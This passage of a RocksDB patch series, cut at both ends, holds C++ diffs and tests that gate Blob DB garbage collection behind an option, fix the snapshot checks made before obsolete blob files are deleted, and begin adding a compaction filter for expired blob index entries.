std::bind(&BlobDBImpl::RunGC, this, std::placeholders::_1)); - tqueue_.add( - kDeleteCheckPeriodMillisecs, - std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1)); - tqueue_.add( - kDeleteCheckPeriodMillisecs, - std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); + if (bdb_options_.enable_garbage_collection) { + tqueue_.add( + kDeleteCheckPeriodMillisecs, + std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1)); + tqueue_.add( + kDeleteCheckPeriodMillisecs, + std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); + } tqueue_.add( kDeleteObsoleteFilesPeriodMillisecs, std::bind(&BlobDBImpl::DeleteObsoleteFiles, this, std::placeholders::_1)); @@ -659,8 +662,10 @@ Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); Status s = db_->Delete(options, key); - // add deleted key to list of keys that have been deleted for book-keeping - delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn}); + if (bdb_options_.enable_garbage_collection) { + // add deleted key to list of keys that have been deleted for book-keeping + delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn}); + } return s; } @@ -780,11 +785,13 @@ Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) { SequenceNumber sequence_; }; - // add deleted key to list of keys that have been deleted for book-keeping - DeleteBookkeeper delete_bookkeeper(this, current_seq); - updates->Iterate(&delete_bookkeeper); + if (bdb_options_.enable_garbage_collection) { + // add deleted key to list of keys that have been deleted for book-keeping + DeleteBookkeeper delete_bookkeeper(this, current_seq); + s = updates->Iterate(&delete_bookkeeper); + } - return Status::OK(); + return s; } Status BlobDBImpl::GetLiveFiles(std::vector& ret, @@ -1318,6 +1325,7 @@ bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, uint64_t blob_offset, uint64_t blob_size) { + assert(bdb_options_.enable_garbage_collection); (void)blob_offset; std::shared_ptr bfile; { @@ -1340,6 +1348,7 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, } bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { + assert(bdb_options_.enable_garbage_collection); BlobIndex blob_index; Status s = blob_index.DecodeFrom(index_entry); if (!s.ok()) { @@ -1354,6 +1363,7 @@ bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { } std::pair BlobDBImpl::EvictCompacted(bool aborted) { + assert(bdb_options_.enable_garbage_collection); if (aborted) return std::make_pair(false, -1); override_packet_t packet; @@ -1377,6 +1387,7 @@ std::pair BlobDBImpl::EvictCompacted(bool aborted) { } std::pair BlobDBImpl::EvictDeletions(bool aborted) { + assert(bdb_options_.enable_garbage_collection); if (aborted) return std::make_pair(false, -1); ColumnFamilyHandle* last_cfh = nullptr; @@ -1882,10 +1893,12 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, ReadLock lockbfile_r(&bfile->mutex_); - if ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > - kPartialExpirationPercentage) { - *reason = "deleted simple blobs beyond threshold"; - return true; + if (bdb_options_.enable_garbage_collection) { + if ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > + kPartialExpirationPercentage) { + *reason = "deleted simple blobs beyond threshold"; + return true; + } } // if we haven't reached limits of disk space, don't DELETE From f90ced92f54890bd435ea3c10cbf664d2176f839 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 15:50:30 -0700 Subject: [PATCH 185/205] Blob DB: fix snapshot handling Summary: Blob db will keep blob file if data in the file is visible to an active snapshot. Before this patch it checks whether there is an active snapshot has sequence number greater than the earliest sequence in the file. This is problematic since we take snapshot on every read, if it keep having reads, old blob files will not be cleanup. Change to check if there is an active snapshot falls in the range of [earliest_sequence, obsolete_sequence) where obsolete sequence is 1. if data is relocated to another file by garbage collection, it is the latest sequence at the time garbage collection finish 2. otherwise, it is the latest sequence of the file Closes https://github.com/facebook/rocksdb/pull/3087 Differential Revision: D6182519 Pulled By: yiwu-arbug fbshipit-source-id: cdf4c35281f782eb2a9ad6a87b6727bbdff27a45 --- db/db_impl.cc | 8 +- db/db_impl.h | 4 +- db/snapshot_impl.h | 16 ++++ utilities/blob_db/blob_db_impl.cc | 90 +++++++++--------- utilities/blob_db/blob_db_impl.h | 3 +- utilities/blob_db/blob_db_test.cc | 148 +++++++++++++++++++++--------- utilities/blob_db/blob_file.cc | 18 ++-- utilities/blob_db/blob_file.h | 30 ++++-- 8 files changed, 207 insertions(+), 110 deletions(-) diff --git a/db/db_impl.cc b/db/db_impl.cc index 0bf425afb71..d1bfe41e8ca 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1583,12 +1583,10 @@ void DBImpl::ReleaseSnapshot(const Snapshot* s) { delete casted_s; } -bool DBImpl::HasActiveSnapshotLaterThanSN(SequenceNumber sn) { +bool DBImpl::HasActiveSnapshotInRange(SequenceNumber lower_bound, + SequenceNumber upper_bound) { InstrumentedMutexLock l(&mutex_); - if (snapshots_.empty()) { - return false; - } - return (snapshots_.newest()->GetSequenceNumber() >= sn); + return snapshots_.HasSnapshotInRange(lower_bound, upper_bound); } #ifndef ROCKSDB_LITE diff --git a/db/db_impl.h b/db/db_impl.h index 230f614b4f4..f1730f9adbd 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -216,7 +216,9 @@ class DBImpl : public DB { virtual SequenceNumber GetLatestSequenceNumber() const override; - bool HasActiveSnapshotLaterThanSN(SequenceNumber sn); + // Whether there is an active snapshot in range [lower_bound, upper_bound). + bool HasActiveSnapshotInRange(SequenceNumber lower_bound, + SequenceNumber upper_bound); #ifndef ROCKSDB_LITE using DB::ResetStats; diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index ad9c1a9fbcc..7dc405931cb 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -108,6 +108,22 @@ class SnapshotList { return ret; } + // Whether there is an active snapshot in range [lower_bound, upper_bound). + bool HasSnapshotInRange(SequenceNumber lower_bound, + SequenceNumber upper_bound) { + if (empty()) { + return false; + } + const SnapshotImpl* s = &list_; + while (s->next_ != &list_) { + if (s->next_->number_ >= lower_bound) { + return s->next_->number_ < upper_bound; + } + s = s->next_; + } + return false; + } + // get the sequence number of the most recent snapshot SequenceNumber GetNewest() { if (empty()) { diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 3a6a84babef..74676d4fa7b 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -956,10 +956,24 @@ bool BlobDBImpl::EvictOldestBlobFile() { } WriteLock wl(&mutex_); - oldest_file->SetCanBeDeleted(); - obsolete_files_.push_front(oldest_file); - oldest_file_evicted_.store(true); - return true; + // Double check the file is not obsolete by others + if (oldest_file_evicted_ == false && !oldest_file->Obsolete()) { + auto expiration_range = oldest_file->GetExpirationRange(); + ROCKS_LOG_INFO(db_options_.info_log, + "Evict oldest blob file since DB out of space. Current " + "space used: %" PRIu64 ", blob dir size: %" PRIu64 + ", evicted blob file #%" PRIu64 + " with expiration range (%" PRIu64 ", %" PRIu64 ").", + total_blob_space_.load(), bdb_options_.blob_dir_size, + oldest_file->BlobFileNumber(), expiration_range.first, + expiration_range.second); + oldest_file->MarkObsolete(oldest_file->GetSequenceRange().second); + obsolete_files_.push_back(oldest_file); + oldest_file_evicted_.store(true); + return true; + } + + return false; } Status BlobDBImpl::CheckSize(size_t blob_size) { @@ -1299,27 +1313,12 @@ Status BlobDBImpl::CloseBlobFileIfNeeded(std::shared_ptr& bfile) { return CloseBlobFile(bfile); } -bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( +bool BlobDBImpl::VisibleToActiveSnapshot( const std::shared_ptr& bfile) { assert(bfile->Obsolete()); - - SequenceNumber esn = bfile->GetSequenceRange().first; - - // TODO(yiwu): Here we should check instead if there is an active snapshot - // lies between the first sequence in the file, and the last sequence by - // the time the file finished being garbage collect. - bool notok = db_impl_->HasActiveSnapshotLaterThanSN(esn); - if (notok) { - ROCKS_LOG_INFO(db_options_.info_log, - "Could not delete file due to snapshot failure %s", - bfile->PathName().c_str()); - return false; - } else { - ROCKS_LOG_INFO(db_options_.info_log, - "Will delete file due to snapshot success %s", - bfile->PathName().c_str()); - return true; - } + SequenceNumber first_sequence = bfile->GetSequenceRange().first; + SequenceNumber obsolete_sequence = bfile->GetObsoleteSequence(); + return db_impl_->HasActiveSnapshotInRange(first_sequence, obsolete_sequence); } bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, @@ -1697,7 +1696,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, ReadOptions(), cfh, record.key, &index_entry, nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB"); - if (!get_status.ok() && !get_status.ok()) { + if (!get_status.ok() && !get_status.IsNotFound()) { // error s = get_status; ROCKS_LOG_ERROR(db_options_.info_log, @@ -1814,6 +1813,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, &rewrite_batch, &callback); } if (rewrite_status.ok()) { + newfile->ExtendSequenceRange( + WriteBatchInternal::Sequence(&rewrite_batch)); gc_stats->relocate_succeeded++; } else if (rewrite_status.IsBusy()) { // The key is overwritten in the meanwhile. Drop the blob record. @@ -1827,6 +1828,17 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, } } // end of ReadRecord loop + if (s.ok()) { + SequenceNumber obsolete_sequence = + newfile == nullptr ? bfptr->GetSequenceRange().second + 1 + : newfile->GetSequenceRange().second; + bfptr->MarkObsolete(obsolete_sequence); + if (!first_gc) { + WriteLock wl(&mutex_); + obsolete_files_.push_back(bfptr); + } + } + ROCKS_LOG_INFO( db_options_.info_log, "%s blob file %" PRIu64 @@ -1935,11 +1947,17 @@ std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { auto bfile = *iter; { ReadLock lockbfile_r(&bfile->mutex_); - if (!FileDeleteOk_SnapshotCheckLocked(bfile)) { + if (VisibleToActiveSnapshot(bfile)) { + ROCKS_LOG_INFO(db_options_.info_log, + "Could not delete file due to snapshot failure %s", + bfile->PathName().c_str()); ++iter; continue; } } + ROCKS_LOG_INFO(db_options_.info_log, + "Will delete file due to snapshot success %s", + bfile->PathName().c_str()); blob_files_.erase(bfile->BlobFileNumber()); Status s = env_->DeleteFile(bfile->PathName()); @@ -2069,8 +2087,6 @@ std::pair BlobDBImpl::RunGC(bool aborted) { FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, files_to_collect); - // in this collect the set of files, which became obsolete - std::vector> obsoletes; for (auto bfile : to_process) { GCStats gc_stats; Status s = GCFileAndUpdateLSM(bfile, &gc_stats); @@ -2084,16 +2100,6 @@ std::pair BlobDBImpl::RunGC(bool aborted) { bfile->deleted_size_ = gc_stats.deleted_size; bfile->deleted_count_ = gc_stats.num_deletes; bfile->gc_once_after_open_ = false; - } else { - obsoletes.push_back(bfile); - } - } - - if (!obsoletes.empty()) { - WriteLock wl(&mutex_); - for (auto bfile : obsoletes) { - bfile->SetCanBeDeleted(); - obsolete_files_.push_front(bfile); } } @@ -2190,16 +2196,6 @@ Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, } void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); } - -void BlobDBImpl::TEST_ObsoleteFile(std::shared_ptr& bfile) { - uint64_t number = bfile->BlobFileNumber(); - assert(blob_files_.count(number) > 0); - bfile->SetCanBeDeleted(); - { - WriteLock l(&mutex_); - obsolete_files_.push_back(bfile); - } -} #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index fc36712bed6..9881107d35f 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -279,8 +279,6 @@ class BlobDBImpl : public BlobDB { void TEST_RunGC(); - void TEST_ObsoleteFile(std::shared_ptr& bfile); - void TEST_DeleteObsoleteFiles(); #endif // !NDEBUG @@ -411,6 +409,7 @@ class BlobDBImpl : public BlobDB { // checks if there is no snapshot which is referencing the // blobs + bool VisibleToActiveSnapshot(const std::shared_ptr& file); bool FileDeleteOk_SnapshotCheckLocked(const std::shared_ptr& bfile); bool MarkBlobDeleted(const Slice& key, const Slice& lsmValue); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 9ffdb234f7c..1c949356541 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -63,6 +63,22 @@ class BlobDBTest : public testing::Test { } } + BlobDBImpl *blob_db_impl() { + return reinterpret_cast(blob_db_); + } + + Status Put(const Slice &key, const Slice &value) { + return blob_db_->Put(WriteOptions(), key, value); + } + + void Delete(const std::string &key, + std::map *data = nullptr) { + ASSERT_OK(blob_db_->Delete(WriteOptions(), key)); + if (data != nullptr) { + data->erase(key); + } + } + void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; @@ -111,14 +127,6 @@ class BlobDBTest : public testing::Test { } } - void Delete(const std::string &key, - std::map *data = nullptr) { - ASSERT_OK(blob_db_->Delete(WriteOptions(), key)); - if (data != nullptr) { - data->erase(key); - } - } - // Verify blob db contain expected data and nothing more. void VerifyDB(const std::map &data) { VerifyDB(blob_db_, data); @@ -593,16 +601,14 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); DBImpl *db_impl = static_cast_with_check(blob_db_->GetBaseDB()); std::map data; for (int i = 0; i < 200; i++) { PutRandom("key" + ToString(i), &rnd, &data); } - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); // Test for data in SST size_t new_keys = 0; for (int i = 0; i < 100; i++) { @@ -620,7 +626,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { } } GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(200, gc_stats.blob_count); ASSERT_EQ(0, gc_stats.num_deletes); ASSERT_EQ(200 - new_keys, gc_stats.num_relocate); @@ -634,11 +640,9 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { bdb_options.disable_background_tasks = true; Open(bdb_options); ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1")); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", @@ -651,7 +655,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { [this]() { ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v2")); }); GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(1, gc_stats.blob_count); ASSERT_EQ(0, gc_stats.num_deletes); ASSERT_EQ(1, gc_stats.num_relocate); @@ -671,11 +675,9 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { Open(bdb_options, options); mock_env_->set_current_time(100); ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200)); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); mock_env_->set_current_time(300); SyncPoint::GetInstance()->LoadDependency( @@ -690,7 +692,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { }); GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(1, gc_stats.blob_count); ASSERT_EQ(1, gc_stats.num_deletes); ASSERT_EQ(0, gc_stats.delete_succeeded); @@ -719,9 +721,7 @@ TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) { for (int i = 0; i < 10; i++) { ASSERT_OK(blob_db_->Put(WriteOptions(), "key" + ToString(i), value)); } - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(11, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); ASSERT_TRUE(blob_files[0]->Immutable()); @@ -731,9 +731,9 @@ TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) { ASSERT_TRUE(blob_files[i]->Immutable()); } } - blob_db_impl->TEST_RunGC(); + blob_db_impl()->TEST_RunGC(); // The oldest simple blob file (i.e. blob_files[1]) has been selected for GC. - auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles(); ASSERT_EQ(1, obsolete_files.size()); ASSERT_EQ(blob_files[1]->BlobFileNumber(), obsolete_files[0]->BlobFileNumber()); @@ -747,13 +747,11 @@ TEST_F(BlobDBTest, ReadWhileGC) { bdb_options.disable_background_tasks = true; Open(bdb_options); blob_db_->Put(WriteOptions(), "foo", "bar"); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); std::shared_ptr bfile = blob_files[0]; uint64_t bfile_number = bfile->BlobFileNumber(); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(bfile)); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile)); switch (i) { case 0: @@ -791,17 +789,16 @@ TEST_F(BlobDBTest, ReadWhileGC) { TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:1"); GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); ASSERT_EQ(1, gc_stats.blob_count); ASSERT_EQ(1, gc_stats.num_relocate); ASSERT_EQ(1, gc_stats.relocate_succeeded); - blob_db_impl->TEST_ObsoleteFile(blob_files[0]); - blob_db_impl->TEST_DeleteObsoleteFiles(); + blob_db_impl()->TEST_DeleteObsoleteFiles(); // The file shouln't be deleted - blob_files = blob_db_impl->TEST_GetBlobFiles(); + blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(2, blob_files.size()); ASSERT_EQ(bfile_number, blob_files[0]->BlobFileNumber()); - auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles(); ASSERT_EQ(1, obsolete_files.size()); ASSERT_EQ(bfile_number, obsolete_files[0]->BlobFileNumber()); TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:2"); @@ -809,16 +806,85 @@ TEST_F(BlobDBTest, ReadWhileGC) { SyncPoint::GetInstance()->DisableProcessing(); // The file is deleted this time - blob_db_impl->TEST_DeleteObsoleteFiles(); - blob_files = blob_db_impl->TEST_GetBlobFiles(); + blob_db_impl()->TEST_DeleteObsoleteFiles(); + blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_NE(bfile_number, blob_files[0]->BlobFileNumber()); - ASSERT_EQ(0, blob_db_impl->TEST_GetObsoleteFiles().size()); + ASSERT_EQ(0, blob_db_impl()->TEST_GetObsoleteFiles().size()); VerifyDB({{"foo", "bar"}}); Destroy(); } } +TEST_F(BlobDBTest, SnapshotAndGarbageCollection) { + BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; + bdb_options.disable_background_tasks = true; + // i = when to take snapshot + for (int i = 0; i < 4; i++) { + for (bool delete_key : {true, false}) { + const Snapshot *snapshot = nullptr; + Destroy(); + Open(bdb_options); + // First file + ASSERT_OK(Put("key1", "value")); + if (i == 0) { + snapshot = blob_db_->GetSnapshot(); + } + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); + // Second file + ASSERT_OK(Put("key2", "value")); + if (i == 1) { + snapshot = blob_db_->GetSnapshot(); + } + blob_files = blob_db_impl()->TEST_GetBlobFiles(); + ASSERT_EQ(2, blob_files.size()); + auto bfile = blob_files[1]; + ASSERT_FALSE(bfile->Immutable()); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile)); + // Third file + ASSERT_OK(Put("key3", "value")); + if (i == 2) { + snapshot = blob_db_->GetSnapshot(); + } + if (delete_key) { + Delete("key2"); + } + GCStats gc_stats; + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); + ASSERT_TRUE(bfile->Obsolete()); + ASSERT_EQ(1, gc_stats.blob_count); + if (delete_key) { + ASSERT_EQ(0, gc_stats.num_relocate); + ASSERT_EQ(bfile->GetSequenceRange().second + 1, + bfile->GetObsoleteSequence()); + } else { + ASSERT_EQ(1, gc_stats.num_relocate); + ASSERT_EQ(blob_db_->GetLatestSequenceNumber(), + bfile->GetObsoleteSequence()); + } + if (i == 3) { + snapshot = blob_db_->GetSnapshot(); + } + size_t num_files = delete_key ? 3 : 4; + ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size()); + blob_db_impl()->TEST_DeleteObsoleteFiles(); + if (i == 0 || i == 3 || (i == 2 && delete_key)) { + // The snapshot shouldn't see data in bfile + ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size()); + } else { + // The snapshot will see data in bfile, so the file shouldn't be deleted + ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size()); + blob_db_->ReleaseSnapshot(snapshot); + blob_db_impl()->TEST_DeleteObsoleteFiles(); + ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size()); + } + } + } +} + TEST_F(BlobDBTest, ColumnFamilyNotSupported) { Options options; options.env = mock_env_.get(); @@ -962,7 +1028,7 @@ TEST_F(BlobDBTest, EvictOldestFileWhenCloseToSpaceLimit) { bdb_options.is_fifo = true; Open(bdb_options); - // Each stored blob has an overhead of about 32 bytes currently. + // Each stored blob has an overhead of 32 bytes currently. // So a 100 byte blob should take up 132 bytes. std::string value(100, 'v'); ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 10)); diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index d50256ca665..bbd88572554 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -36,7 +36,7 @@ BlobFile::BlobFile() deleted_count_(0), deleted_size_(0), closed_(false), - can_be_deleted_(false), + obsolete_(false), gc_once_after_open_(false), expiration_range_({0, 0}), sequence_range_({kMaxSequenceNumber, 0}), @@ -55,7 +55,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) deleted_count_(0), deleted_size_(0), closed_(false), - can_be_deleted_(false), + obsolete_(false), gc_once_after_open_(false), expiration_range_({0, 0}), sequence_range_({kMaxSequenceNumber, 0}), @@ -64,7 +64,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) header_valid_(false) {} BlobFile::~BlobFile() { - if (can_be_deleted_) { + if (obsolete_) { std::string pn(PathName()); Status s = Env::Default()->DeleteFile(PathName()); if (!s.ok()) { @@ -110,17 +110,21 @@ std::string BlobFile::DumpState() const { "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64 " file_size: %" PRIu64 " deleted_count: %" PRIu64 " deleted_size: %" PRIu64 - " closed: %d can_be_deleted: %d expiration_range: (%" PRIu64 - ", %" PRIu64 ") sequence_range: (%" PRIu64 " %" PRIu64 - "), writer: %d reader: %d", + " closed: %d obsolete: %d expiration_range: (%" PRIu64 ", %" PRIu64 + ") sequence_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", path_to_dir_.c_str(), file_number_, blob_count_.load(), gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_, - closed_.load(), can_be_deleted_.load(), expiration_range_.first, + closed_.load(), obsolete_.load(), expiration_range_.first, expiration_range_.second, sequence_range_.first, sequence_range_.second, (!!log_writer_), (!!ra_file_reader_)); return str; } +void BlobFile::MarkObsolete(SequenceNumber sequence) { + obsolete_sequence_ = sequence; + obsolete_.store(true); +} + bool BlobFile::NeedsFsync(bool hard, uint64_t bytes_per_sync) const { assert(last_fsync_ <= file_size_); return (hard) ? file_size_ > last_fsync_ diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index 455383448bb..239e8e1c541 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -63,8 +63,12 @@ class BlobFile { std::atomic closed_; // has a pass of garbage collection successfully finished on this file - // can_be_deleted_ still needs to do iterator/snapshot checks - std::atomic can_be_deleted_; + // obsolete_ still needs to do iterator/snapshot checks + std::atomic obsolete_; + + // The last sequence number by the time the file marked as obsolete. + // Data in this file is visible to a snapshot taken before the sequence. + SequenceNumber obsolete_sequence_; // should this file been gc'd once to reconcile lost deletes/compactions std::atomic gc_once_after_open_; @@ -91,6 +95,8 @@ class BlobFile { bool header_valid_; + SequenceNumber garbage_collection_finish_sequence_; + public: BlobFile(); @@ -117,7 +123,19 @@ class BlobFile { std::string DumpState() const; // if the file has gone through GC and blobs have been relocated - bool Obsolete() const { return can_be_deleted_.load(); } + bool Obsolete() const { + assert(Immutable() || !obsolete_.load()); + return obsolete_.load(); + } + + // Mark file as obsolete by garbage collection. The file is not visible to + // snapshots with sequence greater or equal to the given sequence. + void MarkObsolete(SequenceNumber sequence); + + SequenceNumber GetObsoleteSequence() const { + assert(Obsolete()); + return obsolete_sequence_; + } // if the file is not taking any more appends. bool Immutable() const { return closed_.load(); } @@ -125,6 +143,8 @@ class BlobFile { // we will assume this is atomic bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const; + void Fsync(); + uint64_t GetFileSize() const { return file_size_.load(std::memory_order_acquire); } @@ -155,8 +175,6 @@ class BlobFile { std::shared_ptr GetWriter() const { return log_writer_; } - void Fsync(); - private: std::shared_ptr OpenSequentialReader( Env* env, const DBOptions& db_options, @@ -183,8 +201,6 @@ class BlobFile { void SetFileSize(uint64_t fs) { file_size_ = fs; } void SetBlobCount(uint64_t bc) { blob_count_ = bc; } - - void SetCanBeDeleted() { can_be_deleted_ = true; } }; } // namespace blob_db } // namespace rocksdb From 6fb56c582cc1e2faa4aa1e9a07ce0ae8cfb10508 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 17:26:46 -0700 Subject: [PATCH 186/205] Blob DB: Add compaction filter to remove expired blob index entries Summary: After adding expiration to blob index in #3066, we are now able to add a compaction filter to cleanup expired blob index entries. Closes https://github.com/facebook/rocksdb/pull/3090 Differential Revision: D6183812 Pulled By: yiwu-arbug fbshipit-source-id: 9cb03267a9702975290e758c9c176a2c03530b83 --- db/compaction_iterator.cc | 9 +- include/rocksdb/compaction_filter.h | 3 + utilities/blob_db/blob_compaction_filter.h | 78 ++++++++++++++++ utilities/blob_db/blob_db.cc | 24 ++++- utilities/blob_db/blob_db_impl.cc | 2 + utilities/blob_db/blob_db_test.cc | 102 ++++++++++++++++++++- 6 files changed, 212 insertions(+), 6 deletions(-) create mode 100644 utilities/blob_db/blob_compaction_filter.h diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 8eac637c426..ae63f04d83c 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -230,7 +230,8 @@ void CompactionIterator::NextFromInput() { #endif // ROCKSDB_LITE // apply the compaction filter to the first occurrence of the user key - if (compaction_filter_ != nullptr && ikey_.type == kTypeValue && + if (compaction_filter_ != nullptr && + (ikey_.type == kTypeValue || ikey_.type == kTypeBlobIndex) && (visible_at_tip_ || ikey_.sequence > latest_snapshot_ || ignore_snapshots_)) { // If 